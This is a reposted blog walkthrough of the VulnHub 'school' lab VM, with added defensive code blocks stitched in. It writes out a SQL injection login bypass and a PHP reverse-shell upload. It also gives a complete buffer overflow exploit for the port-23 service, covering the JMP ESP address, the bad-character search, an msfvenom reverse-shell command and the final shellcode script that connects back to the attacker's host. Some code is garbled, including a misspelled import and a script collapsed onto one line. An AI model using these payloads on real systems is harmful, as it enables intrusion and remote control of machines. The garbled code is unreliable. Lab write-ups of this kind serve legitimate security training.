Target Machine Walkthrough Series: the school VM

admin, 2024-10-21 17:08:09, 25 views, 11278 characters



Disclaimer

Most articles on this public account come from the author's daily study notes; some are reposted with the author's authorization or from whitelisted public accounts. Do not use the techniques in these articles for illegal testing; the article author and this account bear no responsibility for any adverse consequences that result.


Target VM download:

https://download.vulnhub.com/school/school.ova.gz


Contents:

Host discovery
Port scanning
Information gathering
SQL injection
Information leak
File upload
Offline password cracking
Online password cracking
WINE
Buffer overflow
Writing the exploit code
Local privilege escalation


1.1 Host discovery

arp-scan -l


1.2 Port scanning

nmap -p- 192.168.144.244


1.3 Information gathering

nmap -p22,23,80 -A 192.168.144.244


Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-01 01:17 EDT
Nmap scan report for 192.168.144.244
Host is up (0.00068s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
|   256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_  256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
23/tcp open  telnet?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, ms-sql-s, oracle-tns, tn3270:
|_    Verification Code:
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-title: 404 Not Found
|_Requested resource was login.php
|_http-server-header: Apache/2.4.38 (Debian)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port23-TCP:V=7.92%I=7%D=11/1%Time=6360ABFE%P=x86_64-pc-linux-gnu%r(NULL
SF:,1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c")%r(GenericLines,
SF:1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c")%r(tn3270,1C,"Ver
SF:ification\x20Code:\n\xee\x1e@\xe2\x1c")%r(GetRequest,1C,"Verifi
SF:cation\x20Code:\n\xee\x1e@\xe2\x1c")%r(HTTPOptions,1C,"Verifica
SF:tion\x20Code:\n\xee\x1e@\xe2\x1c")%r(RTSPRequest,1C,"Verificati
SF:on\x20Code:\n\xee\x1e@\xe2\x1c")%r(RPCCheck,1C,"Verification\x2
SF:0Code:\n\xee\x1e@\xe2\x1c")%r(DNSVersionBindReqTCP,1C,"Verifica
SF:tion\x20Code:\n\xee\x1e@\xe2\x1c")%r(DNSStatusRequestTCP,1C,"Ve
SF:rification\x20Code:\n\xee\x1e@\xe2\x1c")%r(Help,1C,"Verificatio
SF:n\x20Code:\n\xee\x1e@\xe2\x1c")%r(SSLSessionReq,1C,"Verificatio
SF:n\x20Code:\n\xee\x1e@\xe2\x1c")%r(TerminalServerCookie,1C,"Veri
SF:fication\x20Code:\n\xee\x1e@\xe2\x1c")%r(TLSSessionReq,1C,"Veri
SF:fication\x20Code:\n\xee\x1e@\xe2\x1c")%r(Kerberos,1C,"Verificat
SF:ion\x20Code:\n\xee\x1e@\xe2\x1c")%r(SMBProgNeg,1C,"Verification
SF:\x20Code:\n\xee\x1e@\xe2\x1c")%r(X11Probe,1C,"Verification\x20C
SF:ode:\n\xee\x1e@\xe2\x1c")%r(FourOhFourRequest,1C,"Verification
SF:\x20Code:\n\xee\x1e@\xe2\x1c")%r(LPDString,1C,"Verification\x20C
SF:ode:\n\xee\x1e@\xe2\x1c")%r(LDAPSearchReq,1C,"Verification\x20C
SF:ode:\n\xee\x1e@\xe2\x1c")%r(LDAPBindReq,1C,"Verification\x20Cod
SF:e:\n\xee\x1e@\xe2\x1c")%r(SIPOptions,1C,"Verification\x20Code:
SF:\n\xee\x1e@\xe2\x1c")%r(LANDesk-RC,1C,"Verification\x20Code:\n
SF:\xee\x1e@\xe2\x1c")%r(TerminalServer,1C,"Verification\x20Code:\n
SF:\xee\x1e@\xe2\x1c")%r(NCP,1C,"Verification\x20Code:\n\xee
SF:\x1e@\xe2\x1c")%r(NotesRPC,1C,"Verification\x20Code:\n\xee\x1e@
SF:\xe2\x1c")%r(JavaRMI,1C,"Verification\x20Code:\n\xee\x1e@\xe2
SF:\x1c")%r(WMSRequest,1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c
SF:")%r(oracle-tns,1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c")%
SF:r(ms-sql-s,1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c")%r(afp
SF:,1C,"Verification\x20Code:\n\xee\x1e@\xe2\x1c");
MAC Address: 08:00:27:07:C2:39 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   0.68 ms  192.168.144.244

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.54 seconds


1.4 Login page


http://192.168.144.244/student_attendance/login.php


1.5 SQL injection

Username: 1'or 1=1 --     Password: anything

The login succeeds and we are in.
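As an added illustration (not part of the original write-up), the bypass above reproduced in Python against an in-memory SQLite table: vulnerable_login splices the input into the SQL text, the way the login page evidently does, while safe_login binds the same input as parameters. The table contents, the function names and the use of SQLite are constructed for this example.

```python
import sqlite3

# Constructed sample accounts; nothing here comes from the real target.
USERS = [("alice", "s3cret"), ("bob", "hunter2")]

# The payload from the write-up: username 1'or 1=1 -- with any password.
BYPASS_USERNAME = "1'or 1=1 -- "


def make_db():
    """In-memory stand-in for the application's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", USERS)
    return conn


def vulnerable_login(conn, username, password):
    """Login check with the input spliced into the SQL text (the defect)."""
    sql = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
           % (username, password))
    # With the bypass payload the statement becomes
    #   ... WHERE username='1'or 1=1 -- ' AND password='...'
    # so the password clause is commented out and every row matches.
    return [row[0] for row in conn.execute(sql)]


def safe_login(conn, username, password):
    """Same check with bound parameters: the quote stays inside the value."""
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    return [row[0] for row in conn.execute(sql, (username, password))]


if __name__ == "__main__":
    db = make_db()
    print("concatenated query:", vulnerable_login(db, BYPASS_USERNAME, "anything"))
    print("parameterised query:", safe_login(db, BYPASS_USERNAME, "anything"))
    print("valid credentials:", safe_login(db, "alice", "s3cret"))
```

The concatenated version returns every account for the payload; the parameterised version returns nothing for it and still matches a real username and password pair.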


1.6 File upload


Check the page source:

view-source:http://192.168.144.244/student_attendance/index.php

The source exposes an upload path, so a file upload feature exists:

assets/uploads/1604743980_shell.php

http://192.168.144.244/student_attendance/index.php?page=site_settings

The site settings page has the file upload interface.

cp /usr/share/webshells/php/php-reverse-shell.php .
mv php-reverse-shell.php s.php
vim s.php                  # change the IP to the Kali host

Upload the file.

Browse to

http://192.168.144.244/student_attendance/assets/uploads/

The upload succeeded. Start a listener on port 1234 on Kali.

Click the PHP file; the reverse shell comes back.

Upgrade the shell:  python -c "import pty;pty.spawn('/bin/bash')"
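An added example, not the application's or the author's code: the server-side checks whose absence let s.php land in assets/uploads/, together with a small sweep that lists script files found in an upload directory. The allowed image types, the sample uploads and all function names are assumptions made for this example.

```python
import os
import re
import secrets

# Magic bytes for the image types an upload form like this needs (assumption:
# the site settings page only stores images such as a logo).
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
SCRIPT_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}
PHP_OPEN_TAGS = (b"<?php", b"<?=")


def validate_upload(filename, data):
    """Return a safe server-side file name, or raise ValueError.

    These are the checks missing from the vulnerable upload: no path
    components, exactly one allow-listed extension, and content whose magic
    bytes match that extension and carries no PHP open tag.
    """
    base = os.path.basename(filename)
    # exactly one extension; a second dot (shell.php.png) fails the match
    m = re.fullmatch(r"[A-Za-z0-9_-]{1,64}\.([A-Za-z0-9]{1,5})", base)
    if not m:
        raise ValueError("bad filename: %r" % filename)
    ext = m.group(1).lower()
    if ext == "jpeg":
        ext = "jpg"
    if ext not in ALLOWED_TYPES:
        raise ValueError("extension not allowed: %s" % ext)
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise ValueError("content does not match the %s signature" % ext)
    if any(tag in data.lower() for tag in PHP_OPEN_TAGS):
        raise ValueError("script tag embedded in image data")
    # never keep the client's name: a random name cannot be guessed later
    return secrets.token_hex(16) + "." + ext


def find_script_uploads(names):
    """Detection side: names in an uploads directory that are executable scripts."""
    found = []
    for name in names:
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in SCRIPT_EXTENSIONS:
            found.append(name)
    return found


# Constructed sample uploads; the PHP bodies are harmless placeholders.
SAMPLES = {
    "logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "s.php": b"<?php echo 'test'; ?>",
    "shell.php.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
    "poly.gif": b"GIF89a" + b"<?php echo 1; ?>",
}


def check_samples():
    """Return {name: 'accepted' or the rejection reason} for SAMPLES."""
    out = {}
    for name, data in SAMPLES.items():
        try:
            validate_upload(name, data)
            out[name] = "accepted"
        except ValueError as e:
            out[name] = str(e)
    return out


if __name__ == "__main__":
    for name, verdict in check_samples().items():
        print("%-16s %s" % (name, verdict))
    print(find_script_uploads(["1604743980_shell.php", "logo.png", "s.phtml"]))
```

Storing uploads under a random name outside the web root, or in a directory where the web server does not execute PHP, removes the last step of the chain even if a check above is bypassed.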


1.7 WINE


cd /root
ls -la
total 36
drwxr-xr-x  4 root root 4096 Nov  7  2020 .
drwxr-xr-x 18 root root 4096 Nov  3  2020 ..
lrwxrwxrwx  1 root root    9 Nov  7  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
drwx------  2 root root 4096 Oct 27  2020 .ssh
-rw-------  1 root root  764 Nov  7  2020 .viminfo
drwxr-xr-x  4 root root 4096 Nov  1 05:10 .wine          # wine is present
-rw-------  1 root root   33 Nov  7  2020 proof.txt
-rwxr-xr-x  1 root root   61 Nov  3  2020 win            # the program
cd .wine

The win program exists.

ps -ef     shows the win and access.exe processes running

access is what listens on port 23.


1.8 Buffer overflow


Set up the environment

ImmunityDebugger_1_85_setup   https://debugger.immunityinc.com
mona.py                       https://github.com/corelan/mona
access.exe                    downloaded from the target, /opt/access/
funcs_access.dll              downloaded from the target, /opt/access/

Transfer the two files with nc:

nc 192.168.144.247 4444 < access.exe -w 1
nc -lvnp 4444 > access.exe
nc 192.168.144.247 4444 < funcs_access.dll -w 1
nc -lvnp 4444 > funcs_access.dll

Install Immunity Debugger.

Install the script: find the Immunity Debugger\PyCommands directory and put mona.py there.

Setup done; let's begin.

First check the listening ports:

netstat -ano

Run the program:

.\access.exe

Port 23 is now open.

Start Immunity Debugger normally.

Open the application in the debugger and click the run arrow; let the program run until nothing changes any more.

Test script: send 2000 A's

#!/usr/bin/python
import socct

try:
    buffer = b'A' * 2000
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.144.100", 23))   # IP of the Windows host running access.exe
    s.send(buffer)
    s.close()
    print("sent")
except socket.error as e:
    print("failed:", e)

Success.

The program crashed: there is a buffer overflow.

Restart Immunity Debugger.

#!/usr/bin/python
import socket

try:
    buffer = b'A' * 1902 + b'B' * 4 + b'C' * 100
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.144.100", 23))
    s.send(buffer)
    s.close()
    print("sent")
except socket.error as e:
    print("failed:", e)

It crashed again, but now the crash location is pinned down: the 4 B's overwrite the return address, and the 100 C's are where the shellcode will run.

Put JMP ESP in the 4 B's.

Put the shellcode in the 100 C's.

Step 1

Locate JMP ESP

!mona modules

Look for the modules loaded by access; two show False for the protection flags.

!mona find -s "\xff\xe4" -m "funcs_access.dll"      find a JMP ESP address in memory that stays the same every time the program starts

0x625012d0 and 0x625012dd are both JMP ESP.

第二步

测定坏字符

如果使用python3,必须指明数据类型是字节型,传输的payload最好是单行,或者是使用加号多行拼接

如果使用python2,数据类型随便,单行或者多行随便。

#!/usr/bin/pythonimport sysimport socketfrom time import sleep

try: badchars = ( "x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10" "x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20" "x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30" "x31x32x33x34x35x36x37x38x39x3ax3bx3cx3dx3ex3fx40" "x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50" "x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60" "x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70" "x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80" "x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90" "x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0" "xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0" "xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0" "xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0" "xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0" "xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0" "xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff" )
buffer = 'A' * 1902 + 'B' * 4 +badchars s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(("192.168.144.100",23)) s.send(buffer) s.close() print("ndone")except: print("12345")

Bad-character test code

First find ESP, right-click -> Follow in Dump, and look at the bottom-left pane to analyse the bad characters.

At 4D a bad character is not recognised.

So edit the code and repeat: remove each bad character from the set. For example \x4d is bad, so delete it; the code below already has it removed.

#!/usr/bin/python
import socket

try:
    badchars = (
        b"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
        b"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
        b"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
        b"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
        b"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4e\x4f\x50"
        b"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
        b"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
        b"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
        b"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
        b"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
        b"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
        b"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
        b"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
        b"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
        b"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
        b"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
    )
    buffer = b'A' * 1902 + b'B' * 4 + badchars
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.144.100", 23))
    s.send(buffer)
    s.close()
    print("\ndone")
except socket.error as e:
    print("failed:", e)

In total the bad characters are \x4d\x4f\x5f\x79\x7e\x7f.

Step 3

Inject the payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.144.247 LPORT=4444 -f c -b "\x00\x4d\x4f\x5f\x79\x7e\x7f" EXITFUNC=thread

Generate the shellcode:

"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\xb6\xeb\xca\xa1\x83\xee\xfc\xe2\xf4\x4a\x03\x48\xa1\xb6\xeb"
"\xaa\x28\x53\xda\x0a\xc5\x3d\xbb\xfa\x2a\xe4\xe7\x41\xf3\xa2"
"\x60\xb8\x89\xb9\x5c\x80\x87\x87\x14\x66\x9d\xd7\x97\xc8\x8d"
"\x96\x2a\x05\xac\xb7\x2c\x28\x53\xe4\xbc\x41\xf3\xa6\x60\x80"
"\x9d\x3d\xa7\xdb\xd9\x55\xa3\xcb\x70\xe7\x60\x93\x81\xb7\x38"
"\x41\xe8\xae\x08\xf0\xe8\x3d\xdf\x41\xa0\x60\xda\x35\x0d\x77"
"\x24\xc7\xa0\x71\xd3\x2a\xd4\x40\xe8\xb7\x59\x8d\x96\xee\xd4"
"\x52\xb3\x41\xf9\x92\xea\x19\xc7\x3d\xe7\x81\x2a\xee\xf7\xcb"
"\x72\x3d\xef\x41\xa0\x66\x62\x8e\x85\x92\xb0\x91\xc0\xef\xb1"
"\x9b\x5e\x56\xb4\x95\xfb\x3d\xf9\x21\x2c\xeb\x83\xf9\x93\xb6"
"\xeb\xa2\xd6\xc5\xd9\x95\xf5\xde\xa7\xbd\x87\xb1\x14\x1f\x19"
"\x26\xea\xca\xa1\x9f\x2f\x9e\xf1\xde\xc2\x4a\xca\xb6\x14\x1f"
"\xf1\xe6\xbb\x9a\xe1\xe6\xab\x9a\xc9\x5c\xe4\x15\x41\x49\x3e"
"\x5d\xcb\xb3\x83\x0a\x09\x26\x1c\xa2\xa3\xb6\xfa\x96\x28\x50"
"\x81\xda\xf7\xe1\x83\x53\x04\xc2\x8a\x35\x74\x33\x2b\xbe\xad"
"\x49\xa5\xc2\xd4\x5a\x83\x3a\x14\x14\xbd\x35\x74\xde\x88\xa7"
"\xc5\xb6\x62\x29\xf6\xe1\xbc\xfb\x57\xdc\xf9\x93\xf7\x54\x16"
"\xac\x66\xf2\xcf\xf6\xa0\xb7\x66\x8e\x85\xa6\x2d\xca\xe5\xe2"
"\xbb\x9c\xf7\xe0\xad\x9c\xef\xe0\xbd\x99\xf7\xde\x92\x06\x9e"
"\x30\x14\x1f\x28\x56\xa5\x9c\xe7\x49\xdb\xa2\xa9\x31\xf6\xaa"
"\x5e\x63\x50\x2a\xbc\x9c\xe1\xa2\x07\x23\x56\x57\x5e\x63\xd7"
"\xcc\xdd\xbc\x6b\x31\x41\xc3\xee\x71\xe6\xa5\x99\xa5\xcb\xb6"
"\xb8\x35\x74"

The final attack code is as follows, for reference:

#!/usr/bin/python
import socket

# bad characters: \x4d\x4f\x5f\x79\x7e\x7f
# 0x625012dd is JMP ESP in funcs_access.dll

try:
    shellcode = (
        b"\x2b\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
        b"\xb6\xeb\xca\xa1\x83\xee\xfc\xe2\xf4\x4a\x03\x48\xa1\xb6\xeb"
        b"\xaa\x28\x53\xda\x0a\xc5\x3d\xbb\xfa\x2a\xe4\xe7\x41\xf3\xa2"
        b"\x60\xb8\x89\xb9\x5c\x80\x87\x87\x14\x66\x9d\xd7\x97\xc8\x8d"
        b"\x96\x2a\x05\xac\xb7\x2c\x28\x53\xe4\xbc\x41\xf3\xa6\x60\x80"
        b"\x9d\x3d\xa7\xdb\xd9\x55\xa3\xcb\x70\xe7\x60\x93\x81\xb7\x38"
        b"\x41\xe8\xae\x08\xf0\xe8\x3d\xdf\x41\xa0\x60\xda\x35\x0d\x77"
        b"\x24\xc7\xa0\x71\xd3\x2a\xd4\x40\xe8\xb7\x59\x8d\x96\xee\xd4"
        b"\x52\xb3\x41\xf9\x92\xea\x19\xc7\x3d\xe7\x81\x2a\xee\xf7\xcb"
        b"\x72\x3d\xef\x41\xa0\x66\x62\x8e\x85\x92\xb0\x91\xc0\xef\xb1"
        b"\x9b\x5e\x56\xb4\x95\xfb\x3d\xf9\x21\x2c\xeb\x83\xf9\x93\xb6"
        b"\xeb\xa2\xd6\xc5\xd9\x95\xf5\xde\xa7\xbd\x87\xb1\x14\x1f\x19"
        b"\x26\xea\xca\xa1\x9f\x2f\x9e\xf1\xde\xc2\x4a\xca\xb6\x14\x1f"
        b"\xf1\xe6\xbb\x9a\xe1\xe6\xab\x9a\xc9\x5c\xe4\x15\x41\x49\x3e"
        b"\x5d\xcb\xb3\x83\x0a\x09\x26\x1c\xa2\xa3\xb6\xfa\x96\x28\x50"
        b"\x81\xda\xf7\xe1\x83\x53\x04\xc2\x8a\x35\x74\x33\x2b\xbe\xad"
        b"\x49\xa5\xc2\xd4\x5a\x83\x3a\x14\x14\xbd\x35\x74\xde\x88\xa7"
        b"\xc5\xb6\x62\x29\xf6\xe1\xbc\xfb\x57\xdc\xf9\x93\xf7\x54\x16"
        b"\xac\x66\xf2\xcf\xf6\xa0\xb7\x66\x8e\x85\xa6\x2d\xca\xe5\xe2"
        b"\xbb\x9c\xf7\xe0\xad\x9c\xef\xe0\xbd\x99\xf7\xde\x92\x06\x9e"
        b"\x30\x14\x1f\x28\x56\xa5\x9c\xe7\x49\xdb\xa2\xa9\x31\xf6\xaa"
        b"\x5e\x63\x50\x2a\xbc\x9c\xe1\xa2\x07\x23\x56\x57\x5e\x63\xd7"
        b"\xcc\xdd\xbc\x6b\x31\x41\xc3\xee\x71\xe6\xa5\x99\xa5\xcb\xb6"
        b"\xb8\x35\x74"
    )
    # \x90 is NOP; a sled in front of the shellcode makes it run more reliably
    buffer = b'A' * 1902 + b"\xdd\x12\x50\x62" + b"\x90" * 32 + shellcode
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("192.168.144.244", 23))
    s.send(buffer)
    s.close()
    print("\ndone")
except socket.error as e:
    print("failed:", e)

Start the listener on port 4444.

Success.
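Added example, not from the write-up: a classifier for what arrives on the port 23 service, of the kind a network sensor or a wrapper in front of the service could apply before input reaches a fixed-size buffer. It flags the 2000-byte crash probe and an exploit-shaped buffer (1902 bytes of filler, the 0x625012dd return address, a NOP sled and a placeholder payload) while passing a short code. The length limit, the sample messages and the function names are constructed for this example; the real fix is a bounds check on the input inside access.exe.

```python
MAX_CODE_LEN = 64            # assumption: a legitimate verification code is a short token
NOP_SLED = b"\x90" * 16      # 16 consecutive NOPs is already far longer than normal text


def longest_run(data):
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        if cur > best:
            best = cur
    return best


def classify(data):
    """Return a list of indicators; an empty list means the input looks benign."""
    flags = []
    if len(data) > MAX_CODE_LEN:
        flags.append("oversized:%d" % len(data))
    if longest_run(data) >= 32:
        flags.append("repeated-filler")        # pattern-style padding such as 'A' * N
    if NOP_SLED in data:
        flags.append("nop-sled")
    if any((b < 0x20 and b not in (0x09, 0x0a, 0x0d)) or b >= 0x7f for b in data):
        flags.append("non-printable")          # a text prompt should get text back
    return flags


# Constructed samples: a plausible code, the write-up's crash probe, and a buffer
# with the write-up's layout but int3 bytes where the shellcode would sit.
SAMPLES = {
    "legit": b"483920\r\n",
    "crash-probe": b"A" * 2000,
    "exploit-shaped": b"A" * 1902 + b"\xdd\x12\x50\x62" + b"\x90" * 32 + b"\xcc" * 300,
}


def classify_samples():
    """Run classify over every sample and return {name: flags}."""
    return {name: classify(data) for name, data in SAMPLES.items()}


if __name__ == "__main__":
    for name, flags in classify_samples().items():
        print("%-16s %s" % (name, flags or "ok"))
```

Any one of the four indicators is enough to drop the connection or raise an alert; together they also describe what to look for in a packet capture of the crash seen in the debugger.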


1.9 Summary


It finally worked. What troubled me most was the shellcode, especially the bad characters.

This machine was a torment: setting up the environment!

Commands I did not know.

The repetition of the bad characters!!! Agonising.





Originally published on the WeChat public account 嗨嗨安全: 靶机实战系列之school靶机

Disclaimer: the programs (methods) in this article may be offensive in nature and are provided only for security research and teaching; readers who use this information for other purposes bear full legal and joint liability, and this site bears none. Contact by e-mail if there is a problem (a corporate or otherwise valid mailbox is recommended so that mail is not blocked; contact details are on the home page).

Published by admin on 2024-10-21 17:08:09. Please keep this link when reposting (CN-SEC: thanks to the original author for their work): https://cn-sec.com/archives/3295977.html